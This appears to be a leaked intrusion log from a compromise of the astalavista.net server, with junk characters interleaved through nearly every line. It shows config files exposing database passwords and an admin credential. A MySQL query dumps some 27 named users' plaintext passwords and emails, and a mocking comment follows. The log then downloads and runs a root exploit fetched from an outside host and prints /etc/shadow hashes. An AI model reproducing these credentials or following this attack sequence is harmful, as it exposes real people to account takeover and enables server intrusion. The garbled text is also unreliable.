; S- X: ]9 ?/ A; ?& Jdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com8 n# L) |0 _- ?, ^" Y
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
3 x, Q; g# |9 i5 N5 h- C% r/ idrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner8 q9 e, e" g* o
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg5 Z1 U m. N3 X
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
3 w1 W0 J* Z5 D, C3 adrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
* ~# p4 e T% m( c9 s+ cdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd' S* i* L' E7 X0 D
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php+ P& w1 n5 v; s, r- T' L8 v: j" ]
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico" X+ t2 q, U! }+ N
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed2 ~ U$ d+ c! ]
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour8 p( u: c; A" _8 ^) q, r
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
. ~6 L0 q" W& t4 Y! i X3 I& }-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
9 m$ r; f- V8 f' Q# b-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
( p8 b8 C$ [5 C7 H# O, U; c+ }-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
8 J2 J0 e2 U3 Y2 Z, q ~8 ^-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php6 k! W# |* @; u: I7 H
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
8 f* ?( H5 c9 ]. A7 ]8 p7 W-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
, _% A4 B l! X h, V4 D( |drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
" [2 x( U2 k" P- \1 Ydrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
) ~8 W0 A G2 k! U w1 q- Ddrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
% ?: w" x _$ @: S Q7 H& c* gdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log' ]. _7 i& }0 y. j( P
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member! C' ]. W' a5 O& Q! d. ?
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata f( P' d7 ]8 Z
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new. E7 C7 j* s' V' e
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
, Z5 O/ }/ H2 A% V; Edrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
# J0 n% ^- H" q% F3 B+ _-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
/ x0 I1 O: b k) zdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss l& y$ n3 O8 b
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources' P ]5 p! B, o/ t _
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com( {% |/ x9 E; ~& n7 i9 j
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes8 d1 E5 v8 b" r# E _
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src2 E) t; Y( s2 I7 n$ [) m
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
: h9 g" a7 l) t/ t8 q) odrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
! w* B y+ M# `+ ydrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old( x2 S9 ^& V2 c" D! m& l
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php! K% S8 D* f2 o. n! o
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki H* i' s3 a/ \
* L d3 |4 z% a
sh-3.2$ head -20 index.php: w# p1 M N. m+ _8 i' Y1 h
<?PHP5 p& v0 P3 `9 j9 k0 n& A8 j
/**" X$ A9 K) G( W% ?2 W; c& F
* Mainfile (external) for astalavistaNET v2.07 w$ G8 O" d3 ~6 [# Z4 u# U
*
4 C3 h6 j/ u3 g* @copyright Astalavista IT Engineering GmbH" r D4 J. S# U8 r; N
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
8 h6 e9 l i3 L$ o2 [2 \* @version 1.01 f. R' H( Z U
*/
& X3 ^8 a! m* Z) C$ L3 E
3 O% J/ d% D; F" ^* w( J. @7 J if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {- z* M' s2 D3 J# v7 Q, N
$dontStartSession = false;
. v; O* J* F' @7 M } else {
) p; o' i0 }9 ]1 B; p $dontStartSession = true;
* m' v( S, \0 D }, N. E5 u0 O( u. ?! y% Q
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
3 p, z/ x# ?( a3 }5 ^# F8 w require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
. T; t* X, }- X require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
0 c3 X, Y f5 L6 ~9 o& q9 h5 v$ J require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
$ |3 N: Z2 X& K; h! O4 _; l9 Q; y. s
0 w9 |4 F- a4 F6 L, _: m" d) J- qsh-3.2$ cd config
5 A! v: M7 i2 v+ Msh-3.2$ ls -la" ]6 q3 ^+ ~+ {, _8 N) h' i0 _
total 32( r, d9 x" h2 z0 W& }
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
2 s. ?, X* A3 Z! X% x" G- [drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ../ E S0 a) n3 L5 U l0 B
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
9 {8 d( Z; [* x" H3 k-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php' o$ Y, ^) Z9 P) A- _: H9 [
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php! p1 t% e, ^' S/ U
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php S7 t% | v: Q" c+ h5 ^1 s
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php$ j7 H' L9 x' e9 o# u
, B X) r$ X3 Csh-3.2$ cat com.conf.php
4 r9 g v U# ]6 a[snip]8 x' v2 D0 a3 K' r' k
//member-database
' B, G: d4 N) [4 W( O+ f$_CONFIG['db_mem_server'] = ‘localhost’;
$ m8 X; E' W( Q! ]; N& H( q$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
/ h4 Z% c" D( |- q1 c$_CONFIG['db_mem_user'] = ‘astanet_db’;; b, Q7 e/ z5 W1 D
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;8 Q$ ~- O$ @9 q3 v
$_CONFIG['db_mem_debug'] = false; //true or false9 n( x( X3 U' d! _6 n
//ads-database
, i3 o4 j# ?% y5 j$_CONFIG['db_ads_server'] = ‘localhost’;0 c- x8 o9 X9 k7 f' @
$_CONFIG['db_ads_database'] = ‘astanet_ads’;2 ~/ v% v& |0 H; A+ U* u; C$ j
$_CONFIG['db_ads_user'] = ‘astanet_db’;: B: [; F& J1 T- T- P
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
* f% o* [ ^0 [: T$_CONFIG['db_ads_debug'] = false; //true or false
+ q# G) \7 p0 P9 S: U! s6 l//rainbow-database
, u7 e+ D3 Q, T6 i' I$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;4 l1 d9 z, ?2 Z0 b9 g% Q
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
' k3 r x( A6 Y* S$_CONFIG['db_rainbow_user'] = ‘dinu’; F6 K. A5 B1 Z
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
: r# r/ D* q6 a& X+ H' m" K! J( |: L: o$_CONFIG['db_rainbow_debug'] = false; //true or false# d" C: \9 D" \* T, t5 `
//mailing lists database! J0 P5 i! R h. D0 N! h
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
0 S* {' q0 H9 t3 f$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;3 B- T1 c' @% |/ q& x
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
& K+ s$ }7 R, y$ y8 f3 z$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
- t o2 P1 b, W3 R. I$_CONFIG['db_mailing_lists_debug'] = false; //true or false
+ x" Z0 k' c" w8 N' Q+ U//paypal1 z( T6 J3 V0 S6 y
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;% w K" ~$ {% P0 b/ P
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
+ e1 u8 c( y4 p: h4 I$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;7 k$ n8 q8 C0 b/ a* ]
$_CONFIG['sub_pp_noship'] = ‘1′;
$ x F/ @( T7 \3 I# Y; C/ O$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;& Q7 Q8 y& x& n$ i, v' ~! @$ P
[snip]
6 I0 o; G- m6 { p4 _ u9 S
: o. g5 F" v4 C' Y6 B' c* j9 Y, Ksh-3.2$ cd ..2 {2 P3 g. {2 H( p C- {* Q
sh-3.2$ cd member8 d) W* ^" ~) l9 V/ c- Y
sh-3.2$ ls -la1 P1 n2 k5 k' d
total 20& X6 W% B: h* g2 k3 m
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
1 M4 E( }( D5 |7 N" Kdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
: l7 v. d* u6 n" V: ^- R-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
0 S8 K" s+ B! n0 o-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
9 Y6 p7 |9 @& h& E5 V5 ~sh-3.2$ cat .htaccess8 I2 V8 [2 v8 `0 y ?4 W. I# r
SecFilterEngine off, s+ ~1 X! R3 ?( U5 W) _! r$ F' D. }, w
. H/ ]! j% _6 G/ x" l- f- J/ fsh-3.2$ cd ..
1 I# n- |4 R8 P) l \, Ysh-3.2$ cd cron3 f0 i& V+ ]9 o
sh-3.2$ ls -la
/ w; X+ p1 U* {# T) |; V+ qtotal 168% k' F$ J$ S+ o# |# N' X
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
; Y# T* |) e' _: i Idrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
$ T$ Q+ w* o# S- p/ M8 J8 V-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php( |* @3 ]# g' z7 [& k+ w
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
! R# O; U+ P, ?& U+ b0 o, z-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php0 z' t- N7 I2 u* Z
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
% e/ m7 i* t( F* G* c* T. q-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php% l6 Y3 V' E- U1 J- X! e" {0 Q" D3 h$ n
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
' H7 }4 }: f. `3 y- S2 y-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php9 G# m, X, |) D) i {+ ^
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php$ p( V; X! S' i+ V8 p
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
6 H( |3 w! P% P-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
. @; m! T5 I6 S-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php- q8 I9 r. h6 ~9 L; F# q* e# k
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php; Z6 ` }5 U1 o8 A# W9 f+ x w
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh$ E1 a: ]9 R; p# Y$ W& x; }* i. E
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php8 d8 N# f E# \3 O9 l, K- ?
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
# ?$ Y' N! h3 N4 z! m. F$ \1 V L-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
0 e1 R" q* Q6 Z-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php! G& T+ f4 l8 a& f, [7 o% ?
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php- d: A& _' s: Q. n. {% S' p( a" o
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email: D0 o$ Y9 I( u+ p
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php2 V! F7 u0 M. L) r3 }# n
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
, B$ O% H' K+ u' V# z0 V6 ^% D3 S2 F/ M; ~. c
sh-3.2$ cd ..+ A7 c! g# C6 f/ W* b) x. E
sh-3.2$ cd _007
* Z4 L1 z6 a9 j# H9 M$ c5 B9 ]# qsh-3.2$ ls -la3 g; G: y( w: D% k% {+ q7 i4 S4 C& W
total 24) F+ {; D7 p$ L$ e3 i# o
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 ." C A) ^# h+ V1 a( W
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..' c1 L7 Z U3 P
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
( S( Z0 @% n. a4 V8 i$ @5 F; p-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php+ C/ x0 R( O7 [/ j2 P# M6 g: N
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php" Q- s/ ^7 K% [/ ~- O5 Z
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap# b. u4 `; ]+ z7 y+ U3 h( {/ \) P
! l$ J0 w4 e$ k. t: G: f; `
sh-3.2$ cat .htaccess
. }+ @2 o0 I5 @3 q+ o. F, s; g8 R0 yauthType Basic
1 {3 Z" j5 H. s# _* n% n9 d: ^authName Admin
7 ]$ q6 E, B; c+ QauthUserFile /home/astanet/auth/.htadm_pwd% @ U3 R; v+ Q; Q* ?: t2 `- s
require valid-user
& P/ g0 j1 O2 i* E+ d
1 J+ s1 C* J8 Q- m7 t& \% nsh-3.2$ cat /home/astanet/auth/.htadm_pwd p: ]# L) X8 K2 k% d
admin2net:CR0bl65MwhfT' @. C) }9 @$ [7 A0 l
! K4 J% B) } g/ ^* `1 R- e
sh-3.2$ mysql -u astanet_db -p
' i& B. T7 o3 F7 S* \Enter password:, Y# s* F# f( i- C# X- N
Welcome to the MySQL monitor. Commands end with ; or \g.7 Q8 a1 B4 R. R0 {9 L3 D
Your MySQL connection id is 275153
8 g9 e" K4 M. Q, p5 Z. b: a$ l* MServer version: 5.0.45-community-log MySQL Community Edition (GPL)
( f8 W, J5 x+ r# n3 A' X; W4 a k# L. O. ?
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.3 I! W0 O }1 r6 V! }
- N" e* B) K8 M5 C0 Imysql> show databases;/ u- Z0 ^" A" S" m1 `
+———————–+2 q$ \ c( N0 M$ F
| Database |( Z! m; s. t. e# ?( O
+———————–+% i' x* ?- d$ D2 |% H* D! M) ^; c
| information_schema |8 N2 j6 l E; G6 Q% n
| astanet_ads |
/ l+ @* c6 g A* p% [4 B| astanet_mailing_lists |
+ }1 X' f; C$ f. o& L, i| astanet_mediawiki |
- o- R" c' R- K" l. Z| astanet_membersystem |0 v# m' p0 P( q8 M6 i& W
| test |
( L" c* ]' E0 J: {' a/ e* j+———————–+
8 D4 y: G' f1 S; W6 rows in set (0.00 sec)
: i: y1 I" T6 [9 }3 C; M7 d& V& _: R6 S+ @0 e8 ^1 g
mysql> use astanet_membersystem
" f9 \4 v$ \& h/ oDatabase changed
9 Z* I0 ^+ O8 s5 W. a; V( fmysql> show tables;
& F2 u4 v% Z5 c0 o- s* h+———————————–+
" @1 R# g4 |" j& n( r8 k; R- [9 I6 Q| Tables_in_astanet_membersystem |" u* {5 q. K% i3 z( a
+———————————–+
- {! l7 T) @( V: U| blacklist_categories |
. z' w9 X& w* d7 U& y9 z" V| blacklist_content |$ J, ?1 M+ S6 ]9 b: n# a" W; x
| blacklist_levels |$ t g( t+ o$ t1 @4 d* z
| blacklist_mcset |
7 J. a$ I k( ~: b7 u- r| dir_categories |* T+ R/ ]" _, ^, [/ P& J
| dir_comments |
4 X- [5 }8 M0 s& I9 _6 i7 O0 i| dir_links |9 l# q0 {% y9 R5 I: w& e, Q7 l
| dir_temp |6 j/ F' q+ o7 S% d
| dir_votes |" r7 v' U5 `2 R, M7 r9 m+ p7 E: b, Z
| documents |
. z/ v' i: \. C- D( S| documents_categories |
& h) E( P0 t9 E" U x! Z| email_content |
2 {+ `* g J" O. X7 a. @4 ?| email_settings |9 |% N; G, _5 K# u5 ^" |2 t# B! k
| exploits |) }/ V! ]9 `9 k: I% O
| exploits_categories |2 I+ G$ p, u% K/ R; N$ i
| exploittree_categories |
% l2 C; \" l, y, L| exploittree_exploits |
, s3 v$ c/ n# N: H| home_values |8 x/ T: V- \+ j# E5 L8 g
| iso_countries |# j0 l2 {( r+ @9 d0 ]
| links_categories |, d Q0 ~. ]9 j( Y2 W5 {, ?/ }
| links_records |+ o; _9 ]& r5 z6 B8 V, Q
| links_unauth |! X, K$ c2 \$ m7 A @
| links_votes |' |& E# Z6 R. J
| log |+ D+ j% J: b. |5 G3 f
| news_categories |
4 K* C; A4 k9 q( h$ X| news_comments |/ X( B4 M- a3 k$ j
| news_emoticons |. K* `: u* x# t0 e; z3 B. y& c
| news_latest |
2 U0 r c2 X: L# q, K| news_messages |
3 w) r$ C" o. e" _- K2 t- r, }7 Z| news_statistics |
5 Y: B2 C! q' P, Z5 h! g| news_votes |
7 a0 _* X" g3 X7 `5 y| prices_content |% d' h* i: E. c3 d
| prices_offers |) e4 `$ Q8 `/ D7 _
| rss_settings |
+ R, k @$ j( c; E" _' P: V| sessions |
$ ]# ]1 b9 y: A% c/ V| stats_signups |
w/ y( r9 z$ @# R| u2u2 |" u" b# }( Z3 ^8 A- |, B; |" \1 f
| u2u_contact |
' [. k, {" l& h# H3 k' L| u2u_settings |
$ S9 ^2 C7 G8 x# q) v| user_keywords_selected_categories |/ X8 c( e; j, o0 e5 c7 M, V
| users |6 {2 R* \' h) \+ @# D" v4 z
| users_ipn_test |
\# O) F3 w4 y; K) T' B# w- }8 \| users_keyword_values |- `* p7 v1 u& A/ `3 v
| users_profile |" m5 O4 M# b, j0 H- N
| users_temp |
, p$ q) T1 z# i/ Y$ X b/ ^| users_upgrade |
# X. ?+ l. c6 @; p+———————————–+
/ j' i A4 U1 `46 rows in set (0.00 sec)
2 L! Q- R# r4 ~$ Q5 z( H
( ]0 t2 p) ^/ F' M& l/ smysql> describe users;# _ |- K" H: \) K) _
+————————–+————————————–+——+—–+———————+—————-+6 i! l1 \. y% r8 `
| Field | Type | Null | Key | Default | Extra |
2 F+ ]$ A( [' m2 t2 R+————————–+————————————–+——+—–+———————+—————-+
2 {/ c J1 u, w s0 q| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
* k* U. m( D* G) f' M' \| user | varchar(50) | NO | | | |* e2 {7 ^$ `) i g* D$ u$ N* M0 @: U( L
| nickname | varchar(30) | NO | MUL | anonymous | |
! P ?, j3 x. z| password | varchar(30) | NO | | | |: J2 w. O6 r8 S
| userlevel | tinyint(3) | YES | MUL | NULL | |6 a; q" d. Q2 U2 |6 G& E. ^
| exp | int(8) unsigned | NO | | 0 | |5 S3 M$ u* H( l0 P+ v0 A8 E7 `
| email | varchar(50) | NO | | | |
4 [ g+ L" h0 S1 o2 B7 s. i| ip | varchar(15) | NO | | 0 | |
0 ]: r( |9 V8 A7 C @3 o| proxy | set(’0′,’1′) | NO | | 0 | |* w" N5 Z3 r0 \; Y+ Q6 }+ E
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
, z9 }; D9 `9 d9 l4 n4 [; }| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |; b2 A+ b) G1 R! u! r/ t
| anz_in | tinyint(1) | NO | | -1 | |: M x. G. |& v) S! {# p* X
| status | tinyint(1) unsigned | NO | | 0 | |
$ e" |8 C+ R A9 a: E| checked | set(’0′,’1′,’2′) | NO | | 0 | |
4 z7 O- ?) P& {6 V" \| freemember | set(’0′,’1′) | NO | | 0 | |
( C" x( a1 T' C0 |$ `/ q| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
: r6 Q6 p/ D: v/ M6 N& O* G| lang | tinytext | NO | | | |3 l7 C4 z+ t- Q0 H( D% i2 N
| adid | smallint(6) | NO | | 0 | |( [4 V$ b1 G. ^7 r) {
| pp_txn_id | varchar(255) | YES | | NULL | |
7 U' B/ J# I6 `5 p1 [| cnb_transaction_id | varchar(255) | YES | | NULL | |
1 u% H- g1 G, p: X| cnb_order_id | varchar(255) | YES | | NULL | |
6 V2 ?9 j6 J# z| cnb_user_id | int(11) | YES | | 0 | |
+ ^+ M5 S: i4 o! A1 u+————————–+————————————–+——+—–+———————+—————-+3 Z: e1 j4 _. a
22 rows in set (0.01 sec)
* v$ f! b( b2 ^; a; }
`, }* g# g, D' G& k$ Vmysql> select count(*) as skids from users;
& U' I+ E) |1 W7 f2 g% t h! R+——-+$ W6 |6 W& X. g; a. u K% r
| skids |
2 S( N: E) v8 @! Z+——-+7 X8 o5 o- C7 e7 e
| 25199 |
, V/ b- w% @, e$ V; J( e- a! y+——-+
6 _- m; I3 Z$ D1 X/ f$ N1 row in set (0.00 sec)4 S/ R( l' h" C5 L* @
/ K# D+ }& S$ q& u/ v1 c
mysql> select user,nickname,password,email from users where userlevel = 1;9 C6 L3 d+ A9 z( Z( u0 m, X
+————————–+———————-+——————+———————————–+/ B0 p. @7 Y" S7 Q' `) [' i) K
| user | nickname | password | email |& k: p1 m% l+ S$ r* e
+————————–+———————-+——————+———————————–+
$ D2 n& L- h/ E" k| pascal | prozac | astaman3 | 链接标记info@astalavista.net | F) q% t0 w" V7 M$ s- Y
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
# m" v- R6 e! H r' v) l, H| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |/ H3 W# i/ R) @+ A
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
3 V: m3 F+ f+ Q* M5 Z9 R! H$ J| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
$ T I& s% m/ v( H$ [3 e| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
7 C5 S) _' w6 ]| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
4 G* z( F/ S0 E| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |. R& ~2 C! p5 j' o S! @
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |6 ]8 D; u% s0 A% T0 T" h
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |/ P! D* {7 L* u$ S6 C; c" m
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
% u+ e% @: p/ R# r3 {, y# i| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |; z- o3 \$ G# r
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |# ~- R, q0 K, `4 d* S. ^
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |1 e# b! L# d6 u; v+ [' R
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
# f3 V$ U; E( v3 O| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |$ e2 u3 a2 D6 R2 f0 j' Q
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
3 Q* r0 W9 d5 M. || Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |$ E8 f+ k5 I) h, o5 v0 _2 z0 L
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
. H0 D# A8 q, v+ v$ a6 H9 E2 ^| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
" b! z0 K4 W" ~8 E; \/ ~: s| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
- h; e5 k( p' t8 ?+ n5 G" ]| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |; z- @/ t8 x! U
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |( C$ V. `' K' O X" B y) V
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
3 B9 g7 {3 X t! ^| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |, n ]! X, d2 o
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |* [" G) e0 g% j5 R% ^
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |6 ^ D! `2 Y! {. L! q
+————————–+———————-+——————+———————————–+- y# X. m3 I. F+ a: [$ u( ]. h
27 rows in set (0.00 sec), ?2 d, R5 A7 {! o' x( y
1 |7 |( O k: B/ Y6 g
mysql> exit;
8 ^" ~% l2 J9 |- X! oBye
& j7 L0 y' [1 C! V2 _) [4 Y* B5 p7 j2 D) n& \+ U, E: k7 v
[~] plaintext passwords? yes,
2 ~# J3 I+ y5 w5 Q# o$ w; L; [Those so called “security professionals” who charge you $6.66 / month to
% d& O6 E4 r) K5 n# [& z/ L0 Gregister at their hack-proof portal, save your passwords in plaintext…* @, `$ \) l. V. x8 ]& o
brilliant!
7 j8 V6 ^/ F* Q! I, S) E0 r# Z; c( y3 p
[~] This been fun but we want more.6 u7 X" V6 R5 U$ p3 {
: v; m9 s$ M8 P5 f [# b1 X
sh-3.2$ uname -a6 z5 I- R- \; V8 i/ I2 I; @
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux4 n& H+ G6 I! Z" l/ n% M M
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]: l7 \. f8 p1 L6 T; o b7 K/ W k. O
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]! U7 M, y: T8 T: @7 \" {% B, p# r7 `
Resolving anti.sec.labs… 13.33.33.374 b! V D8 n$ n
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
5 D' u' Q' m- u* g# X0 Z( g) ?HTTP request sent, awaiting response… 200 OK
! I& S9 x, k6 [8 E, }2 \! sLength: 18200 (18K) [text/plain]
1 e. J5 h* N7 [5 eSaving to: `g0troot’& L: b4 Q7 a9 j& B' E& s) A& |7 h5 h
4 f; f9 X1 l$ [, B: ~100%[=========================================================================================================================================>] 18,200 58.6K/s in
- s3 E) L& m% ]" h3 h y. s- B7 u0.3s
! r4 S- G* \1 M& ^( }6 m) q) q) n
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]( N3 k( W. A) f
( i: A+ Y, r9 b1 C. vsh-3.2$ ./g0troot -i x86_642 F2 ^4 h6 Z& X2 F6 O( r/ d
[+] g0troot - anti.sec.labs
0 C" P0 O# `3 i1 M9 N" p' S& Z[+] Target: 2.6.18-128.1.10.el5 u2 [# m3 e4 r! V9 P$ u
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]& x, j r! u# P L9 y0 h2 k
) Q& m- P. w9 }" _0 K" Y[+] r00tr00t) O4 ]# `" e4 h O" h. S A' o: x
[~] Executing shell…
N% c8 a% x/ x/ Y9 Q/ D
: `, Y' B" x% Q0 _( s5 J4 Gsh-3.2# id
# Z# }5 _+ I" euid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
2 A! K( a) S( N3 I) N9 T3 j1 |: `. @4 i
sh-3.2# cat /etc/shadow
( V' y }0 J( J7 x9 k' b8 [root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
' j7 a' m3 s" d2 \[snip]
$ V3 s: ^4 k3 _# e! e& madmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
8 v/ L. r- v, Cjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
$ [4 x$ t! @5 P8 X0 E- }- e! ucom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
, L8 a. d9 W- c& a5 W4 i. `astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::& c9 R q# p4 g+ C: M) H! C- X
7 c& e. S% Y; h8 c1 F/ {% }
sh-3.2# cat /etc/motd
) [; S t# k& O* K#####################################################
